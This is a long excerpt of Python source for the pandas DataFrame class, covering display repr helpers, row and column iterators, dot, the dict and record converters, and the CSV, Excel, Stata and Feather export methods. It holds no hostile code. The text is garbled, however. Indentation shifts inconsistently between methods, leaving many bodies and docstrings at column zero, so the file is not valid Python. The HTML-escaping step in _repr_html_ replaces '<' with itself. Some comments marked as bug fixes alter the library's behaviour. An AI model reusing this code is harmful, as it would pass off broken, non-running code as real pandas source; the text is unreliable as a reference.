        # check whether repr fits horizontal by actually checking
        # the width of the rendered repr
        buf = StringIO()
        # only care about the stuff we'll actually print out
        # and to_string on entire frame may be expensive
        d = self
        if not (max_rows is None):  # rows are capped: truncate before render
            # min of two, where one may be None
            d = d.iloc[:min(max_rows, len(d))]
        else:
            # unlimited rows: rendering the whole frame could be expensive,
            # so just report that it fits
            return True
        d.to_string(buf=buf)
        value = buf.getvalue()
        repr_width = max(len(l) for l in value.split('\n'))
        return repr_width < width
def _info_repr(self):
"""True if the repr should show the info view."""
info_repr_option = (get_option("display.large_repr") == "info")
return info_repr_option and not (self._repr_fits_horizontal_() and
self._repr_fits_vertical_())
def __unicode__(self):
"""
Return a string representation for a particular DataFrame
Invoked by unicode(df) in py2 only. Yields a Unicode String in both
py2/py3.
"""
buf = StringIO(u(""))
if self._info_repr():
self.info(buf=buf)
return buf.getvalue()
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
if get_option("display.expand_frame_repr"):
width, _ = console.get_console_size()
else:
width = None
self.to_string(buf=buf, max_rows=max_rows, max_cols=max_cols,
line_width=width, show_dimensions=show_dimensions)
return buf.getvalue()
def _repr_html_(self):
"""
Return a html representation for a particular DataFrame.
Mainly for IPython notebook.
"""
# qtconsole doesn't report its line width, and also
# behaves badly when outputting an HTML table
# that doesn't fit the window, so disable it.
# XXX: In IPython 3.x and above, the Qt console will not attempt to
# display HTML, so this check can be removed when support for
# IPython 2.x is no longer needed.
if com.in_qtconsole():
# 'HTML output is disabled in QtConsole'
return None
if self._info_repr():
buf = StringIO(u(""))
self.info(buf=buf)
# need to escape the <class>, should be the first line.
val = buf.getvalue().replace('<', r'<', 1)
val = val.replace('>', r'>', 1)
return '<pre>' + val + '</pre>'
if get_option("display.notebook_repr_html"):
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
return self.to_html(max_rows=max_rows, max_cols=max_cols,
show_dimensions=show_dimensions, notebook=True)
else:
return None
    @property
    def style(self):
        """
        Property returning a Styler object containing methods for
        building a styled HTML representation of the DataFrame.

        See Also
        --------
        pandas.io.formats.style.Styler
        """
        # imported lazily: the Styler machinery is only needed on demand
        from pandas.io.formats.style import Styler
        return Styler(self)
def iteritems(self):
"""
Iterator over (column name, Series) pairs.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
itertuples : Iterate over DataFrame rows as namedtuples of the values.
"""
if self.columns.is_unique and hasattr(self, '_item_cache'):
for k in self.columns:
yield k, self._get_item_cache(k)
else:
for i, k in enumerate(self.columns):
yield k, self._ixs(i, axis=1)
def iterrows(self):
"""
Iterate over DataFrame rows as (index, Series) pairs.
Notes
-----
1. Because ``iterrows`` returns a Series for each row,
it does **not** preserve dtypes across the rows (dtypes are
preserved across columns for DataFrames). For example,
>>> df = pd.DataFrame([[1, 1.5]], columns=['int', 'float'])
>>> row = next(df.iterrows())[1]
>>> row
int 1.0
float 1.5
Name: 0, dtype: float64
>>> print(row['int'].dtype)
float64
>>> print(df['int'].dtype)
int64
To preserve dtypes while iterating over the rows, it is better
to use :meth:`itertuples` which returns namedtuples of the values
and which is generally faster than ``iterrows``.
2. You should **never modify** something you are iterating over.
This is not guaranteed to work in all cases. Depending on the
data types, the iterator returns a copy and not a view, and writing
to it will have no effect.
Returns
-------
it : generator
A generator that iterates over the rows of the frame.
See also
--------
itertuples : Iterate over DataFrame rows as namedtuples of the values.
iteritems : Iterate over (column name, Series) pairs.
"""
columns = self.columns
klass = self._constructor_sliced
for k, v in zip(self.index, self.values):
s = klass(v, index=columns, name=k)
yield k, s
def itertuples(self, index=True, name="Pandas"):
"""
Iterate over DataFrame rows as namedtuples, with index value as first
element of the tuple.
Parameters
----------
index : boolean, default True
If True, return the index as the first element of the tuple.
name : string, default "Pandas"
The name of the returned namedtuples or None to return regular
tuples.
Notes
-----
The column names will be renamed to positional names if they are
invalid Python identifiers, repeated, or start with an underscore.
With a large number of columns (>255), regular tuples are returned.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
iteritems : Iterate over (column name, Series) pairs.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
>>> df
col1 col2
a 1 0.1
b 2 0.2
>>> for row in df.itertuples():
... print(row)
...
Pandas(Index='a', col1=1, col2=0.10000000000000001)
Pandas(Index='b', col1=2, col2=0.20000000000000001)
"""
arrays = []
fields = []
if index:
arrays.append(self.index)
fields.append("Index")
# use integer indexing because of possible duplicate column names
arrays.extend(self.iloc[:, k] for k in range(len(self.columns)))
# Python 3 supports at most 255 arguments to constructor, and
# things get slow with this many fields in Python 2
if name is not None and len(self.columns) + index < 256:
# `rename` is unsupported in Python 2.6
try:
itertuple = collections.namedtuple(name,
fields + list(self.columns),
rename=True)
return map(itertuple._make, zip(*arrays))
except Exception:
pass
# fallback to regular tuples
return zip(*arrays)
items = iteritems
    def __len__(self):
        """Return the number of rows, i.e. the length of the index."""
        return len(self.index)
def dot(self, other):
"""
Matrix multiplication with DataFrame or Series objects
Parameters
----------
other : DataFrame or Series
Returns
-------
dot_product : DataFrame or Series
"""
if isinstance(other, (Series, DataFrame)):
common = self.columns.union(other.index)
if (len(common) > len(self.columns) or
len(common) > len(other.index)):
raise ValueError('matrices are not aligned')
left = self.reindex(columns=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right.values
else:
left = self
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[1] != rvals.shape[0]:
raise ValueError('Dot product shape mismatch, %s vs %s' %
(lvals.shape, rvals.shape))
if isinstance(other, DataFrame):
return self._constructor(np.dot(lvals, rvals), index=left.index,
columns=other.columns)
elif isinstance(other, Series):
return Series(np.dot(lvals, rvals), index=left.index)
elif isinstance(rvals, (np.ndarray, Index)):
result = np.dot(lvals, rvals)
if result.ndim == 2:
return self._constructor(result, index=left.index)
else:
return Series(result, index=left.index)
else: # pragma: no cover
raise TypeError('unsupported type: %s' % type(other))
# ----------------------------------------------------------------------
# IO methods (to / from other formats)
@classmethod
def from_dict(cls, data, orient='columns', dtype=None, columns=None):
"""
Construct DataFrame from dict of array-like or dicts.
Creates DataFrame object from dictionary by columns or by index
allowing dtype specification.
Parameters
----------
data : dict
Of the form {field : array-like} or {field : dict}.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the passed dict
should be the columns of the resulting DataFrame, pass 'columns'
(default). Otherwise if the keys should be rows, pass 'index'.
dtype : dtype, default None
Data type to force, otherwise infer.
columns : list, default None
Column labels to use when ``orient='index'``. Raises a ValueError
if used with ``orient='columns'``.
.. versionadded:: 0.23.0
Returns
-------
pandas.DataFrame
See Also
--------
DataFrame.from_records : DataFrame from ndarray (structured
dtype), list of tuples, dict, or DataFrame
DataFrame : DataFrame object creation using constructor
Examples
--------
By default the keys of the dict become the DataFrame columns:
>>> data = {'col_1': [3, 2, 1, 0], 'col_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Specify ``orient='index'`` to create the DataFrame using dictionary
keys as rows:
>>> data = {'row_1': [3, 2, 1, 0], 'row_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data, orient='index')
0 1 2 3
row_1 3 2 1 0
row_2 a b c d
When using the 'index' orientation, the column names can be
specified manually:
>>> pd.DataFrame.from_dict(data, orient='index',
... columns=['A', 'B', 'C', 'D'])
A B C D
row_1 3 2 1 0
row_2 a b c d
"""
index = None
orient = orient.lower()
if orient == 'index':
if len(data) > 0:
# TODO speed up Series case
if isinstance(list(data.values())[0], (Series, dict)):
data = _from_nested_dict(data)
else:
data, index = list(data.values()), list(data.keys())
elif orient == 'columns':
if columns is not None:
raise ValueError("cannot use columns parameter with "
"orient='columns'")
else: # pragma: no cover
raise ValueError('only recognize index or columns for orient')
return cls(data, index=index, columns=columns, dtype=dtype)
    def to_dict(self, orient='dict', into=dict):
        """
        Convert the DataFrame to a dictionary.
        The type of the key-value pairs can be customized with the parameters
        (see below).
        Parameters
        ----------
        orient : str {'dict', 'list', 'series', 'split', 'records', 'index'}
            Determines the type of the values of the dictionary.
            - 'dict' (default) : dict like {column -> {index -> value}}
            - 'list' : dict like {column -> [values]}
            - 'series' : dict like {column -> Series(values)}
            - 'split' : dict like
              {'index' -> [index], 'columns' -> [columns], 'data' -> [values]}
            - 'records' : list like
              [{column -> value}, ... , {column -> value}]
            - 'index' : dict like {index -> {column -> value}}
            Abbreviations are allowed. `s` indicates `series` and `sp`
            indicates `split`.
        into : class, default dict
            The collections.Mapping subclass used for all Mappings
            in the return value.  Can be the actual class or an empty
            instance of the mapping type you want.  If you want a
            collections.defaultdict, you must pass it initialized.
            .. versionadded:: 0.21.0
        Returns
        -------
        result : collections.Mapping like {column -> {index -> value}}
        See Also
        --------
        DataFrame.from_dict: create a DataFrame from a dictionary
        DataFrame.to_json: convert a DataFrame to JSON format
        Examples
        --------
        >>> df = pd.DataFrame({'col1': [1, 2],
        ...                    'col2': [0.5, 0.75]},
        ...                   index=['a', 'b'])
        >>> df
           col1  col2
        a     1  0.50
        b     2  0.75
        >>> df.to_dict()
        {'col1': {'a': 1, 'b': 2}, 'col2': {'a': 0.5, 'b': 0.75}}
        You can specify the return orientation.
        >>> df.to_dict('series')
        {'col1': a    1
                 b    2
                 Name: col1, dtype: int64,
         'col2': a    0.50
                 b    0.75
                 Name: col2, dtype: float64}
        >>> df.to_dict('split')
        {'index': ['a', 'b'], 'columns': ['col1', 'col2'],
         'data': [[1.0, 0.5], [2.0, 0.75]]}
        >>> df.to_dict('records')
        [{'col1': 1.0, 'col2': 0.5}, {'col1': 2.0, 'col2': 0.75}]
        >>> df.to_dict('index')
        {'a': {'col1': 1.0, 'col2': 0.5}, 'b': {'col1': 2.0, 'col2': 0.75}}
        You can also specify the mapping type.
        >>> from collections import OrderedDict, defaultdict
        >>> df.to_dict(into=OrderedDict)
        OrderedDict([('col1', OrderedDict([('a', 1), ('b', 2)])),
                     ('col2', OrderedDict([('a', 0.5), ('b', 0.75)]))])
        If you want a `defaultdict`, you need to initialize it:
        >>> dd = defaultdict(list)
        >>> df.to_dict('records', into=dd)
        [defaultdict(<class 'list'>, {'col1': 1.0, 'col2': 0.5}),
         defaultdict(<class 'list'>, {'col1': 2.0, 'col2': 0.75})]
        """
        if not self.columns.is_unique:
            warnings.warn("DataFrame columns are not unique, some "
                          "columns will be omitted.", UserWarning,
                          stacklevel=2)
        # GH16122
        into_c = com.standardize_mapping(into)
        # NOTE: orients are dispatched by *prefix* match, so 'sp' (split)
        # must be tested before 's' (series).
        if orient.lower().startswith('d'):
            return into_c(
                (k, v.to_dict(into)) for k, v in compat.iteritems(self))
        elif orient.lower().startswith('l'):
            return into_c((k, v.tolist()) for k, v in compat.iteritems(self))
        elif orient.lower().startswith('sp'):
            # box datetimelike scalars elementwise, preserving the 2-d shape
            return into_c((('index', self.index.tolist()),
                           ('columns', self.columns.tolist()),
                           ('data', lib.map_infer(self.values.ravel(),
                                                  com._maybe_box_datetimelike)
                            .reshape(self.values.shape).tolist())))
        elif orient.lower().startswith('s'):
            return into_c((k, com._maybe_box_datetimelike(v))
                          for k, v in compat.iteritems(self))
        elif orient.lower().startswith('r'):
            return [into_c((k, com._maybe_box_datetimelike(v))
                           for k, v in zip(self.columns, np.atleast_1d(row)))
                    for row in self.values]
        elif orient.lower().startswith('i'):
            # itertuples yields (index, val1, val2, ...)
            return into_c((t[0], dict(zip(self.columns, t[1:])))
                          for t in self.itertuples())
        else:
            raise ValueError("orient '%s' not understood" % orient)
    def to_gbq(self, destination_table, project_id, chunksize=10000,
               verbose=True, reauth=False, if_exists='fail', private_key=None):
        """Write a DataFrame to a Google BigQuery table.
        The main method a user calls to export pandas DataFrame contents to
        Google BigQuery table.
        Google BigQuery API Client Library v2 for Python is used.
        Documentation is available `here
        <https://developers.google.com/api-client-library/python/apis/bigquery/v2>`__
        Authentication to the Google BigQuery service is via OAuth 2.0.
        - If "private_key" is not provided:
          By default "application default credentials" are used.
          If default application credentials are not found or are restrictive,
          user account credentials are used. In this case, you will be asked to
          grant permissions for product name 'pandas GBQ'.
        - If "private_key" is provided:
          Service account credentials will be used to authenticate.
        Parameters
        ----------
        destination_table : string
            Name of table to be written, in the form 'dataset.tablename'
        project_id : str
            Google BigQuery Account project ID.
        chunksize : int (default 10000)
            Number of rows to be inserted in each chunk from the dataframe.
        verbose : boolean (default True)
            Show percentage complete
        reauth : boolean (default False)
            Force Google BigQuery to reauthenticate the user. This is useful
            if multiple accounts are used.
        if_exists : {'fail', 'replace', 'append'}, default 'fail'
            'fail': If table exists, do nothing.
            'replace': If table exists, drop it, recreate it, and insert data.
            'append': If table exists, insert data. Create if does not exist.
        private_key : str (optional)
            Service account private key in JSON format. Can be file path
            or string contents. This is useful for remote server
            authentication (eg. Jupyter/IPython notebook on remote host)
        """
        # Thin wrapper: delegates entirely to pandas.io.gbq.to_gbq with
        # ``self`` as the frame to upload.
        from pandas.io import gbq
        return gbq.to_gbq(self, destination_table, project_id=project_id,
                          chunksize=chunksize, verbose=verbose, reauth=reauth,
                          if_exists=if_exists, private_key=private_key)
    @classmethod
    def from_records(cls, data, index=None, exclude=None, columns=None,
                     coerce_float=False, nrows=None):
        """
        Convert structured or record ndarray to DataFrame
        Parameters
        ----------
        data : ndarray (structured dtype), list of tuples, dict, or DataFrame
        index : string, list of fields, array-like
            Field of array to use as the index, alternately a specific set of
            input labels to use
        exclude : sequence, default None
            Columns or fields to exclude
        columns : sequence, default None
            Column names to use. If the passed data do not have names
            associated with them, this argument provides names for the
            columns. Otherwise this argument indicates the order of the columns
            in the result (any names not found in the data will become all-NA
            columns)
        coerce_float : boolean, default False
            Attempt to convert values of non-string, non-numeric objects (like
            decimal.Decimal) to floating point, useful for SQL result sets
        nrows : int, default None
            Number of rows to read when ``data`` is an iterator.
        Returns
        -------
        df : DataFrame
        """
        # Make a copy of the input columns so we can modify it
        if columns is not None:
            columns = _ensure_index(columns)
        if is_iterator(data):
            if nrows == 0:
                return cls()
            # peek at the first row to sniff a structured dtype
            try:
                first_row = next(data)
            except StopIteration:
                return cls(index=index, columns=columns)
            dtype = None
            if hasattr(first_row, 'dtype') and first_row.dtype.names:
                dtype = first_row.dtype
            values = [first_row]
            if nrows is None:
                values += data
            else:
                values.extend(itertools.islice(data, nrows - 1))
            if dtype is not None:
                data = np.array(values, dtype=dtype)
            else:
                data = values
        if isinstance(data, dict):
            if columns is None:
                columns = arr_columns = _ensure_index(sorted(data))
                arrays = [data[k] for k in columns]
            else:
                # keep only requested keys, then reorder to match ``columns``
                arrays = []
                arr_columns = []
                for k, v in compat.iteritems(data):
                    if k in columns:
                        arr_columns.append(k)
                        arrays.append(v)
                arrays, arr_columns = _reorder_arrays(arrays, arr_columns,
                                                      columns)
        elif isinstance(data, (np.ndarray, DataFrame)):
            arrays, columns = _to_arrays(data, columns)
            if columns is not None:
                columns = _ensure_index(columns)
            arr_columns = columns
        else:
            arrays, arr_columns = _to_arrays(data, columns,
                                             coerce_float=coerce_float)
            arr_columns = _ensure_index(arr_columns)
            if columns is not None:
                columns = _ensure_index(columns)
            else:
                columns = arr_columns
        if exclude is None:
            exclude = set()
        else:
            exclude = set(exclude)
        result_index = None
        if index is not None:
            if (isinstance(index, compat.string_types) or
                    not hasattr(index, "__iter__")):
                # single field name: promote that column to the index
                i = columns.get_loc(index)
                exclude.add(index)
                if len(arrays) > 0:
                    result_index = Index(arrays[i], name=index)
                else:
                    result_index = Index([], name=index)
            else:
                # list of field names -> MultiIndex; if the lookup fails,
                # fall back to treating ``index`` as explicit labels
                try:
                    to_remove = [arr_columns.get_loc(field) for field in index]
                    index_data = [arrays[i] for i in to_remove]
                    result_index = _ensure_index_from_sequences(index_data,
                                                                names=index)
                    exclude.update(index)
                except Exception:
                    result_index = index
        if any(exclude):
            # drop excluded fields from both the arrays and the labels
            arr_exclude = [x for x in exclude if x in arr_columns]
            to_remove = [arr_columns.get_loc(col) for col in arr_exclude]
            arrays = [v for i, v in enumerate(arrays) if i not in to_remove]
            arr_columns = arr_columns.drop(arr_exclude)
            columns = columns.drop(exclude)
        mgr = _arrays_to_mgr(arrays, arr_columns, result_index, columns)
        return cls(mgr)
def to_records(self, index=True, convert_datetime64=True):
    """
    Convert DataFrame to a NumPy record array.

    Index will be put in the 'index' field of the record array if
    requested.

    Parameters
    ----------
    index : boolean, default True
        Include index in resulting record array, stored in 'index'
        field (one field per level for a MultiIndex).
    convert_datetime64 : boolean, default True
        Whether to convert a DatetimeIndex to `datetime.datetime`
        values instead of keeping the raw datetime64 data.

    Returns
    -------
    y : numpy.recarray

    See Also
    --------
    DataFrame.from_records : Convert structured or record ndarray
        to DataFrame.
    numpy.recarray : ndarray that allows field access using attributes.
    """
    if index:
        # Decide which array(s) the index contributes to the record.
        if convert_datetime64 and is_datetime64_any_dtype(self.index):
            index_arrays = [self.index.to_pydatetime()]
        elif isinstance(self.index, MultiIndex):
            # array of tuples to numpy cols. copy copy copy
            index_arrays = lmap(np.array, zip(*self.index.values))
        else:
            index_arrays = [self.index.values]

        arrays = index_arrays + [self[c].get_values()
                                 for c in self.columns]

        level_names = list(self.index.names)
        if isinstance(self.index, MultiIndex):
            # Unnamed MultiIndex levels get synthetic 'level_N' names.
            unnamed = 0
            for pos, name in enumerate(level_names):
                if name is None:
                    level_names[pos] = 'level_%d' % unnamed
                    unnamed += 1
        elif level_names[0] is None:
            level_names = ['index']

        names = (lmap(compat.text_type, level_names) +
                 lmap(compat.text_type, self.columns))
    else:
        arrays = [self[c].get_values() for c in self.columns]
        names = lmap(compat.text_type, self.columns)

    formats = [arr.dtype for arr in arrays]
    return np.rec.fromarrays(
        arrays,
        dtype={'names': names, 'formats': formats}
    )
@classmethod
def from_items(cls, items, columns=None, orient='columns'):
    """Construct a DataFrame from a sequence of (key, value) pairs.

    .. deprecated:: 0.23.0
        `from_items` is deprecated and will be removed in a future
        version. Use :meth:`DataFrame.from_dict(dict(items))
        <DataFrame.from_dict>` instead.
        :meth:`DataFrame.from_dict(OrderedDict(items)) <DataFrame.from_dict>`
        may be used to preserve the key order.

    The keys become the axis index (usually the columns, but depends
    on the specified orientation). The values should be arrays or
    Series.

    Parameters
    ----------
    items : sequence of (key, value) pairs
        Values should be arrays or Series.
    columns : sequence of column labels, optional
        Must be passed if orient='index'.
    orient : {'columns', 'index'}, default 'columns'
        The "orientation" of the data. If the keys of the input
        correspond to column labels, pass 'columns' (default).
        Otherwise if the keys correspond to the index, pass 'index'.

    Returns
    -------
    frame : DataFrame

    Raises
    ------
    ValueError
        If a value is not an array, Series, or dict, or if array
        construction from the given values fails.
    """
    warnings.warn("from_items is deprecated. Please use "
                  "DataFrame.from_dict(dict(items), ...) instead. "
                  "DataFrame.from_dict(OrderedDict(items)) may be used to "
                  "preserve the key order.",
                  FutureWarning, stacklevel=2)

    keys, values = lzip(*items)

    if orient == 'columns':
        if columns is not None:
            columns = _ensure_index(columns)

            idict = dict(items)
            if len(idict) < len(items):
                # Duplicate keys: dict() collapsed them, so we can only
                # honor the passed columns if they match the keys exactly.
                if not columns.equals(_ensure_index(keys)):
                    raise ValueError('With non-unique item names, passed '
                                     'columns must be identical')
                arrays = values
            else:
                arrays = [idict[k] for k in columns if k in idict]
        else:
            columns = _ensure_index(keys)
            arrays = values

        # GH 17312
        # Provide more informative error msg when scalar values passed
        try:
            return cls._from_arrays(arrays, columns, None)
        except ValueError:
            if not is_nested_list_like(values):
                raise ValueError('The value in each (key, value) pair '
                                 'must be an array, Series, or dict')
            # BUG FIX: the original error was silently swallowed here for
            # nested inputs, making the method fall through and return
            # None. Re-raise so construction failures are not hidden.
            raise

    elif orient == 'index':
        if columns is None:
            raise TypeError("Must pass columns with orient='index'")

        keys = _ensure_index(keys)

        # GH 17312
        # Provide more informative error msg when scalar values passed
        try:
            arr = np.array(values, dtype=object).T
            data = [lib.maybe_convert_objects(v) for v in arr]
            return cls._from_arrays(data, columns, keys)
        except TypeError:
            if not is_nested_list_like(values):
                raise ValueError('The value in each (key, value) pair '
                                 'must be an array, Series, or dict')
            # BUG FIX: re-raise instead of silently returning None (see
            # the 'columns' branch above).
            raise

    else:  # pragma: no cover
        raise ValueError("'orient' must be either 'columns' or 'index'")
@classmethod
def _from_arrays(cls, arrays, columns, index, dtype=None):
    """Build a DataFrame directly from column arrays (internal helper).

    ``columns`` is passed twice to ``_arrays_to_mgr`` because it serves
    both as the array labels and as the final column index.
    """
    return cls(_arrays_to_mgr(arrays, columns, index, columns,
                              dtype=dtype))
@classmethod
def from_csv(cls, path, header=0, sep=',', index_col=0, parse_dates=True,
             encoding=None, tupleize_cols=None,
             infer_datetime_format=False):
    """Read CSV file.

    .. deprecated:: 0.21.0
        Use :func:`pandas.read_csv` instead.

    This is a thin, deprecated wrapper whose only differences from
    :func:`pandas.read_csv` are its defaults:

    - `index_col` is ``0`` instead of ``None`` (take first column as
      index by default)
    - `parse_dates` is ``True`` instead of ``False`` (try parsing the
      index as datetime by default)

    So ``pd.DataFrame.from_csv(path)`` can be replaced by
    ``pd.read_csv(path, index_col=0, parse_dates=True)``.

    Parameters
    ----------
    path : string file path or file handle / StringIO
    header : int, default 0
        Row to use as header (skip prior rows).
    sep : string, default ','
        Field delimiter.
    index_col : int or sequence, default 0
        Column to use for index. If a sequence is given, a MultiIndex
        is used.
    parse_dates : boolean, default True
        Parse dates.
    tupleize_cols : boolean, default False
        Write multi_index columns as a list of tuples (if True) or in
        the new (expanded) format (if False).
    infer_datetime_format : boolean, default False
        If True and `parse_dates` is True, try to infer the datetime
        format from the first datetime string for a parsing speed-up.

    See also
    --------
    pandas.read_csv

    Returns
    -------
    y : DataFrame
    """
    warnings.warn("from_csv is deprecated. Please use read_csv(...) "
                  "instead. Note that some of the default arguments are "
                  "different, so please refer to the documentation "
                  "for from_csv when changing your function calls",
                  FutureWarning, stacklevel=2)

    from pandas.io.parsers import read_table
    read_kwargs = dict(header=header, sep=sep, parse_dates=parse_dates,
                       index_col=index_col, encoding=encoding,
                       tupleize_cols=tupleize_cols,
                       infer_datetime_format=infer_datetime_format)
    return read_table(path, **read_kwargs)
def to_sparse(self, fill_value=None, kind='block'):
    """
    Convert this DataFrame to a SparseDataFrame.

    Parameters
    ----------
    fill_value : float, default NaN
        Value treated as "missing" in the sparse representation.
    kind : {'block', 'integer'}
        Kind of sparse index to use.

    Returns
    -------
    y : SparseDataFrame
    """
    from pandas.core.sparse.frame import SparseDataFrame
    sparse_kwargs = dict(index=self.index, columns=self.columns,
                         default_kind=kind,
                         default_fill_value=fill_value)
    return SparseDataFrame(self._series, **sparse_kwargs)
def to_panel(self):
    """
    Transform long (stacked) format (DataFrame) into wide (3D, Panel)
    format.

    .. deprecated:: 0.20.0

    Currently the index of the DataFrame must be a 2-level MultiIndex. This
    may be generalized later

    Returns
    -------
    panel : Panel
    """
    # only support this kind for now
    if (not isinstance(self.index, MultiIndex) or  # pragma: no cover
            len(self.index.levels) != 2):
        raise NotImplementedError('Only 2-level MultiIndex are supported.')

    if not self.index.is_unique:
        raise ValueError("Can't convert non-uniquely indexed "
                         "DataFrame to Panel")

    self._consolidate_inplace()

    # minor axis must be sorted; lexsort_depth < 2 means the two index
    # levels are not fully sorted, so sort on the outer level first.
    if self.index.lexsort_depth < 2:
        selfsorted = self.sort_index(level=0)
    else:
        selfsorted = self

    # level values become the panel's major/minor axes; the integer
    # label codes position each row within the (major, minor) grid.
    major_axis, minor_axis = selfsorted.index.levels
    major_labels, minor_labels = selfsorted.index.labels
    shape = len(major_axis), len(minor_axis)

    # preserve names, if any (copy so we don't mutate the shared levels)
    major_axis = major_axis.copy()
    major_axis.name = self.index.names[0]
    minor_axis = minor_axis.copy()
    minor_axis.name = self.index.names[1]

    # create new axes
    new_axes = [selfsorted.columns, major_axis, minor_axis]

    # create new manager; reshape_nd scatters the 2D blocks into the
    # 3D (items, major, minor) layout
    new_mgr = selfsorted._data.reshape_nd(axes=new_axes,
                                          labels=[major_labels,
                                                  minor_labels],
                                          shape=shape,
                                          ref_items=selfsorted.columns)

    return self._constructor_expanddim(new_mgr)
def to_csv(self, path_or_buf=None, sep=",", na_rep='', float_format=None,
           columns=None, header=True, index=True, index_label=None,
           mode='w', encoding=None, compression=None, quoting=None,
           quotechar='"', line_terminator='\n', chunksize=None,
           tupleize_cols=None, date_format=None, doublequote=True,
           escapechar=None, decimal='.'):
    r"""Write DataFrame to a comma-separated values (csv) file.

    Parameters
    ----------
    path_or_buf : string or file handle, default None
        File path or object; if None the result is returned as a
        string.
    sep : character, default ','
        Field delimiter for the output file.
    na_rep : string, default ''
        Missing data representation.
    float_format : string, default None
        Format string for floating point numbers.
    columns : sequence, optional
        Columns to write.
    header : boolean or list of string, default True
        Write out the column names. If a list of strings is given it
        is assumed to be aliases for the column names.
    index : boolean, default True
        Write row names (index).
    index_label : string or sequence, or False, default None
        Column label(s) for index column(s) if desired. If None is
        given, and `header` and `index` are True, the index names are
        used. A sequence should be given for a MultiIndex. If False,
        do not print fields for index names (easier importing in R).
    mode : str
        Python write mode, default 'w'.
    encoding : string, optional
        Encoding for the output file; defaults to 'ascii' on Python 2
        and 'utf-8' on Python 3.
    compression : string, optional
        One of 'gzip', 'bz2', 'zip', 'xz'. Only used when the first
        argument is a filename.
    quoting : optional constant from csv module
        Defaults to csv.QUOTE_MINIMAL. With a `float_format` set,
        floats become strings, so csv.QUOTE_NONNUMERIC treats them as
        non-numeric.
    quotechar : string (length 1), default '\"'
        Character used to quote fields.
    line_terminator : string, default ``'\n'``
        Newline character or character sequence to use in the output
        file.
    chunksize : int or None
        Rows to write at a time.
    tupleize_cols : boolean, default False
        .. deprecated:: 0.21.0
        Write MultiIndex columns as a list of tuples (if True) or in
        the new, expanded format (if False).
    date_format : string, default None
        Format string for datetime objects.
    doublequote : boolean, default True
        Control quoting of `quotechar` inside a field.
    escapechar : string (length 1), default None
        Character used to escape `sep` and `quotechar` when
        appropriate.
    decimal : string, default '.'
        Character recognized as decimal separator, e.g. ',' for
        European data.
    """
    if tupleize_cols is not None:
        warnings.warn("The 'tupleize_cols' parameter is deprecated and "
                      "will be removed in a future version",
                      FutureWarning, stacklevel=2)
    else:
        tupleize_cols = False

    from pandas.io.formats.csvs import CSVFormatter
    csv_kwargs = dict(line_terminator=line_terminator, sep=sep,
                      encoding=encoding, compression=compression,
                      quoting=quoting, na_rep=na_rep,
                      float_format=float_format, cols=columns,
                      header=header, index=index,
                      index_label=index_label, mode=mode,
                      chunksize=chunksize, quotechar=quotechar,
                      tupleize_cols=tupleize_cols,
                      date_format=date_format, doublequote=doublequote,
                      escapechar=escapechar, decimal=decimal)
    csv_formatter = CSVFormatter(self, path_or_buf, **csv_kwargs)
    csv_formatter.save()

    # With no target supplied, hand the rendered CSV back as a string.
    if path_or_buf is None:
        return csv_formatter.path_or_buf.getvalue()
@Appender(_shared_docs['to_excel'] % _shared_doc_kwargs)
def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='',
             float_format=None, columns=None, header=True, index=True,
             index_label=None, startrow=0, startcol=0, engine=None,
             merge_cells=True, encoding=None, inf_rep='inf', verbose=True,
             freeze_panes=None):
    # Docstring is injected by the @Appender decorator above.
    from pandas.io.formats.excel import ExcelFormatter

    # Render this frame with the Excel-specific formatter, then let the
    # formatter drive the actual workbook writing.
    excel_formatter = ExcelFormatter(self, na_rep=na_rep, cols=columns,
                                     header=header,
                                     float_format=float_format,
                                     index=index,
                                     index_label=index_label,
                                     merge_cells=merge_cells,
                                     inf_rep=inf_rep)
    excel_formatter.write(excel_writer, sheet_name=sheet_name,
                          startrow=startrow, startcol=startcol,
                          freeze_panes=freeze_panes, engine=engine)
def to_stata(self, fname, convert_dates=None, write_index=True,
             encoding="latin-1", byteorder=None, time_stamp=None,
             data_label=None, variable_labels=None):
    """
    Write this DataFrame to a Stata binary dta file.

    Parameters
    ----------
    fname : str or buffer
        String path or file-like object.
    convert_dates : dict
        Maps datetime columns to the Stata internal date format to use
        when writing ('tc', 'td', 'tm', 'tw', 'th', 'tq', 'ty').
        Columns can be integers or names. Datetime columns without a
        conversion type are written as 'tc'. Raises
        NotImplementedError if a datetime column has timezone
        information.
    write_index : bool
        Write the index to Stata dataset.
    encoding : str
        Default is latin-1. Unicode is not supported.
    byteorder : str
        Can be ">", "<", "little", or "big". Default is
        `sys.byteorder`.
    time_stamp : datetime
        A datetime to use as file creation date. Default is the
        current time.
    data_label : str
        A label for the data set. Must be 80 characters or smaller.
    variable_labels : dict
        Dictionary containing columns as keys and variable labels as
        values. Each label must be 80 characters or smaller.

        .. versionadded:: 0.19.0

    Raises
    ------
    NotImplementedError
        * If datetimes contain timezone information
        * Column dtype is not representable in Stata
    ValueError
        * Columns listed in convert_dates are neither datetime64[ns]
          or datetime.datetime
        * Column listed in convert_dates is not in DataFrame
        * Categorical label contains more than 32,000 characters

    Examples
    --------
    >>> data.to_stata('./data_file.dta')

    Or with dates

    >>> data.to_stata('./date_data_file.dta', {2 : 'tw'})
    """
    from pandas.io.stata import StataWriter
    stata_writer = StataWriter(fname, self, convert_dates=convert_dates,
                               encoding=encoding, byteorder=byteorder,
                               time_stamp=time_stamp,
                               data_label=data_label,
                               write_index=write_index,
                               variable_labels=variable_labels)
    stata_writer.write_file()
def to_feather(self, fname):
    """
    Write this DataFrame out in the binary Feather format.

    .. versionadded:: 0.20.0

    Parameters
    ----------
    fname : str
        String file path to write to.
    """
    from pandas.io.feather_format import to_feather as _write_feather
    _write_feather(self, fname)
def to_parquet(self, fname, engine='auto', compression='snappy',
